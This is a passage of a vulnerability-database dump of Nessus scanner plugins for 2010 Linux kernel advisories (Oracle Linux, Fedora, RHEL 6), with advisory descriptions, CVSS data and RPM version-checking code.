value:\"2023/06/02\");\n\n script_name(english:\"Oracle Linux 5 : Unbreakable Enterprise kernel (ELSA-2010-2009)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Description of changes:\n\nFollowing Security bug are fixed in this errata\n\nCVE-2010-3904\nWhen copying data to userspace, the RDS protocol failed to verify that \nthe user-provided address was a valid\nuserspace address. A local unprivileged user could issue specially \ncrafted socket calls to write arbitrary\nvalues into kernel memory and potentially escalate privileges to root.\n\nCVE-2010-3067\nInteger overflow in the do_io_submit function in fs/aio.c in the Linux \nkernel before 2.6.36-rc4-next-20100915\nallows local users to cause a denial of service or possibly have \nunspecified other impact via crafted use of\nthe io_submit system call.\n\nCVE-2010-3477\nThe tcf_act_police_dump function in net/sched/act_police.c in the \nactions implementation in the network queueing\nfunctionality in the Linux kernel before 2.6.36-rc4 does not properly \ninitialize certain structure members, which\nallows local users to obtain potentially sensitive information from \nkernel memory via vectors involving a dump\noperation. NOTE: this vulnerability exists because of an incomplete fix \nfor CVE-2010-2942.\n\nkernel:\n\n[2.6.32-100.21.1.el5]\n- [rds] fix access issue with rds (Chris Mason) {CVE-2010-3904}\n- [fuse] linux-2.6.32-fuse-return-EGAIN-if-not-connected-bug-10154489.patch\n- [net] linux-2.6.32-net-sched-fix-kernel-leak-in-act_police.patch\n- [aio] \nlinux-2.6.32-aio-check-for-multiplication-overflow-in-do_io_subm.patch\n\nofa:\n\n[1.5.1-4.0.23]\n- Fix rds permissions checks during copies\n\n[1.5.1-4.0.21]\n- Update to BXOFED 1.5.1-1.3.6-5\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2010-October/001707.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected unbreakable enterprise kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2010-2942\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/09/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ofa-2.6.32-100.21.1.el5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n cve_list = make_list(\"CVE-2010-2942\", \"CVE-2010-3067\", \"CVE-2010-3477\", \"CVE-2010-3904\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2010-2009\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-2.6.32\") && rpm_check(release:\"EL5\", cpu:\"x86_64\", reference:\"kernel-2.6.32-100.21.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-2.6.32\") && rpm_check(release:\"EL5\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.32-100.21.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-devel-2.6.32\") && rpm_check(release:\"EL5\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.32-100.21.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-devel-2.6.32\") && rpm_check(release:\"EL5\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.32-100.21.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-doc-2.6.32\") && rpm_check(release:\"EL5\", cpu:\"x86_64\", reference:\"kernel-doc-2.6.32-100.21.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-firmware-2.6.32\") && rpm_check(release:\"EL5\", cpu:\"x86_64\", reference:\"kernel-firmware-2.6.32-100.21.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-headers-2.6.32\") && rpm_check(release:\"EL5\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.32-100.21.1.el5\")) flag++;\nif (rpm_check(release:\"EL5\", cpu:\"x86_64\", reference:\"ofa-2.6.32-100.21.1.el5-1.5.1-4.0.23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T15:52:42", "description": "Fix several important security issues.\n\nAlso fixes suspend on some systems with TPM chips, enables additional Ricoh SDHC adapters, and fixes a problem with the error message printed when an Intel IOMMU gets disabled.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2010-10-29T00:00:00", "type": "nessus", "title": "Fedora 14 : kernel-2.6.35.6-48.fc14 (2010-16826)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2962", "CVE-2010-2963", "CVE-2010-3698", "CVE-2010-3904"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:14"], "id": "FEDORA_2010-16826.NASL", "href": "https://www.tenable.com/plugins/nessus/50400", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-16826.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50400);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\n \"CVE-2010-2962\",\n \"CVE-2010-2963\",\n \"CVE-2010-3698\",\n \"CVE-2010-3904\"\n );\n script_bugtraq_id(44067, 44219, 44242);\n script_xref(name:\"FEDORA\", value:\"2010-16826\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Fedora 14 : kernel-2.6.35.6-48.fc14 (2010-16826)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Fix several important security issues.\n\nAlso fixes suspend on some systems with TPM chips, enables additional\nRicoh SDHC adapters, and fixes a problem with the error message\nprinted when an Intel IOMMU gets disabled.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=637688\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=639879\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642465\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642896\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/049999.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1a6e8ed3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2023 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"kernel-2.6.35.6-48.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T15:53:42", "description": "Updated kernel packages that fix multiple security issues and several bugs are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\n[Updated 22 November 2010] The packages list in this erratum has been updated to include four missing debuginfo-common packages (one per architecture). No changes have been made to the original packages.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nThis update fixes the following security issues :\n\n* Missing sanity checks in the Intel i915 driver in the Linux kernel could allow a local, unprivileged user to escalate their privileges.\n(CVE-2010-2962, Important)\n\n* compat_alloc_user_space() in the Linux kernel 32/64-bit compatibility layer implementation was missing sanity checks. This function could be abused in other areas of the Linux kernel if its length argument can be controlled from user-space. On 64-bit systems, a local, unprivileged user could use this flaw to escalate their privileges. (CVE-2010-3081, Important)\n\n* A buffer overflow flaw in niu_get_ethtool_tcam_all() in the niu Ethernet driver in the Linux kernel, could allow a local user to cause a denial of service or escalate their privileges. (CVE-2010-3084, Important)\n\n* A flaw in the IA32 system call emulation provided in 64-bit Linux kernels could allow a local user to escalate their privileges.\n(CVE-2010-3301, Important)\n\n* A flaw in sctp_packet_config() in the Linux kernel's Stream Control Transmission Protocol (SCTP) implementation could allow a remote attacker to cause a denial of service. (CVE-2010-3432, Important)\n\n* A missing integer overflow check in snd_ctl_new() in the Linux kernel's sound subsystem could allow a local, unprivileged user on a 32-bit system to cause a denial of service or escalate their privileges. (CVE-2010-3442, Important)\n\n* A flaw was found in sctp_auth_asoc_get_hmac() in the Linux kernel's SCTP implementation. When iterating through the hmac_ids array, it did not reset the last id element if it was out of range. This could allow a remote attacker to cause a denial of service. (CVE-2010-3705, Important)\n\n* A function in the Linux kernel's Reliable Datagram Sockets (RDS) protocol implementation was missing sanity checks, which could allow a local, unprivileged user to escalate their privileges. (CVE-2010-3904, Important)\n\n* A flaw in drm_ioctl() in the Linux kernel's Direct Rendering Manager (DRM) implementation could allow a local, unprivileged user to cause an information leak. (CVE-2010-2803, Moderate)\n\n* It was found that wireless drivers might not always clear allocated buffers when handling a driver-specific IOCTL information request. A local user could trigger this flaw to cause an information leak.\n(CVE-2010-2955, Moderate)\n\n* A NULL pointer dereference flaw in ftrace_regex_lseek() in the Linux kernel's ftrace implementation could allow a local, unprivileged user to cause a denial of service. Note: The debugfs file system must be mounted locally to exploit this issue. It is not mounted by default.\n(CVE-2010-3079, Moderate)\n\n* A flaw in the Linux kernel's packet writing driver could be triggered via the PKT_CTRL_CMD_STATUS IOCTL request, possibly allowing a local, unprivileged user with access to '/dev/pktcdvd/control' to cause an information leak. Note: By default, only users in the cdrom group have access to '/dev/pktcdvd/control'. (CVE-2010-3437, Moderate)\n\n* A flaw was found in the way KVM (Kernel-based Virtual Machine) handled the reloading of fs and gs segment registers when they had invalid selectors. A privileged host user with access to '/dev/kvm' could use this flaw to crash the host. (CVE-2010-3698, Moderate)\n\nRed Hat would like to thank Kees Cook for reporting CVE-2010-2962 and CVE-2010-2803; Ben Hawkes for reporting CVE-2010-3081 and CVE-2010-3301; Dan Rosenberg for reporting CVE-2010-3442, CVE-2010-3705, CVE-2010-3904, and CVE-2010-3437; and Robert Swiecki for reporting CVE-2010-3079.\n\nThis update also fixes several bugs. Documentation for these bug fixes will be available shortly from the Technical Notes document linked to in the References section.\n\nUsers should upgrade to these updated packages, which contain backported patches to correct these issues. The system must be rebooted for this update to take effect.", "cvss3": {}, "published": "2010-11-18T00:00:00", "type": "nessus", "title": "RHEL 6 : kernel (RHSA-2010:0842)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2803", "CVE-2010-2955", "CVE-2010-2962", "CVE-2010-3079", "CVE-2010-3081", "CVE-2010-3084", "CVE-2010-3301", "CVE-2010-3432", "CVE-2010-3437", "CVE-2010-3442", "CVE-2010-3698", "CVE-2010-3705", "CVE-2010-3904"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "REDHAT-RHSA-2010-0842.NASL", "href": "https://www.tenable.com/plugins/nessus/50629", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0842. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50629);\n script_version(\"1.42\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\n \"CVE-2010-2803\",\n \"CVE-2010-2955\",\n \"CVE-2010-2962\",\n \"CVE-2010-3079\",\n \"CVE-2010-3081\",\n \"CVE-2010-3084\",\n \"CVE-2010-3301\",\n \"CVE-2010-3432\",\n \"CVE-2010-3437\",\n \"CVE-2010-3442\",\n \"CVE-2010-3698\",\n \"CVE-2010-3705\",\n \"CVE-2010-3904\"\n );\n script_bugtraq_id(\n 42577,\n 42885,\n 43098,\n 43239,\n 43355,\n 43480,\n 43551,\n 43684,\n 43701,\n 43787,\n 44067,\n 44219,\n 44500\n );\n script_xref(name:\"RHSA\", value:\"2010:0842\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"RHEL 6 : kernel (RHSA-2010:0842)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Updated kernel packages that fix multiple security issues and several\nbugs are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\n[Updated 22 November 2010] The packages list in this erratum has been\nupdated to include four missing debuginfo-common packages (one per\narchitecture). No changes have been made to the original packages.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* Missing sanity checks in the Intel i915 driver in the Linux kernel\ncould allow a local, unprivileged user to escalate their privileges.\n(CVE-2010-2962, Important)\n\n* compat_alloc_user_space() in the Linux kernel 32/64-bit\ncompatibility layer implementation was missing sanity checks. This\nfunction could be abused in other areas of the Linux kernel if its\nlength argument can be controlled from user-space. On 64-bit systems,\na local, unprivileged user could use this flaw to escalate their\nprivileges. (CVE-2010-3081, Important)\n\n* A buffer overflow flaw in niu_get_ethtool_tcam_all() in the niu\nEthernet driver in the Linux kernel, could allow a local user to cause\na denial of service or escalate their privileges. (CVE-2010-3084,\nImportant)\n\n* A flaw in the IA32 system call emulation provided in 64-bit Linux\nkernels could allow a local user to escalate their privileges.\n(CVE-2010-3301, Important)\n\n* A flaw in sctp_packet_config() in the Linux kernel's Stream Control\nTransmission Protocol (SCTP) implementation could allow a remote\nattacker to cause a denial of service. (CVE-2010-3432, Important)\n\n* A missing integer overflow check in snd_ctl_new() in the Linux\nkernel's sound subsystem could allow a local, unprivileged user on a\n32-bit system to cause a denial of service or escalate their\nprivileges. (CVE-2010-3442, Important)\n\n* A flaw was found in sctp_auth_asoc_get_hmac() in the Linux kernel's\nSCTP implementation. When iterating through the hmac_ids array, it did\nnot reset the last id element if it was out of range. This could allow\na remote attacker to cause a denial of service. (CVE-2010-3705,\nImportant)\n\n* A function in the Linux kernel's Reliable Datagram Sockets (RDS)\nprotocol implementation was missing sanity checks, which could allow a\nlocal, unprivileged user to escalate their privileges. (CVE-2010-3904,\nImportant)\n\n* A flaw in drm_ioctl() in the Linux kernel's Direct Rendering Manager\n(DRM) implementation could allow a local, unprivileged user to cause\nan information leak. (CVE-2010-2803, Moderate)\n\n* It was found that wireless drivers might not always clear allocated\nbuffers when handling a driver-specific IOCTL information request. A\nlocal user could trigger this flaw to cause an information leak.\n(CVE-2010-2955, Moderate)\n\n* A NULL pointer dereference flaw in ftrace_regex_lseek() in the Linux\nkernel's ftrace implementation could allow a local, unprivileged user\nto cause a denial of service. Note: The debugfs file system must be\nmounted locally to exploit this issue. It is not mounted by default.\n(CVE-2010-3079, Moderate)\n\n* A flaw in the Linux kernel's packet writing driver could be\ntriggered via the PKT_CTRL_CMD_STATUS IOCTL request, possibly allowing\na local, unprivileged user with access to '/dev/pktcdvd/control' to\ncause an information leak. Note: By default, only users in the cdrom\ngroup have access to '/dev/pktcdvd/control'. (CVE-2010-3437, Moderate)\n\n* A flaw was found in the way KVM (Kernel-based Virtual Machine)\nhandled the reloading of fs and gs segment registers when they had\ninvalid selectors. A privileged host user with access to '/dev/kvm'\ncould use this flaw to crash the host. (CVE-2010-3698, Moderate)\n\nRed Hat would like to thank Kees Cook for reporting CVE-2010-2962 and\nCVE-2010-2803; Ben Hawkes for reporting CVE-2010-3081 and\nCVE-2010-3301; Dan Rosenberg for reporting CVE-2010-3442,\nCVE-2010-3705, CVE-2010-3904, and CVE-2010-3437; and Robert Swiecki\nfor reporting CVE-2010-3079.\n\nThis update also fixes several bugs. Documentation for these bug fixes\nwill be available shortly from the Technical Notes document linked to\nin the References section.\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues. The system must be\nrebooted for this update to take effect.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2010-2803\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2010-2955\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2010-2962\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2010-3079\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2010-3081\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2010-3084\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2010-3301\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2010-3432\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2010-3437\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2010-3442\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2010-3698\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2010-3705\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2010-3904\");\n # http://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Linux/6/html-single/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d2334068\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2010:0842\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2010-3081\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/09/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n 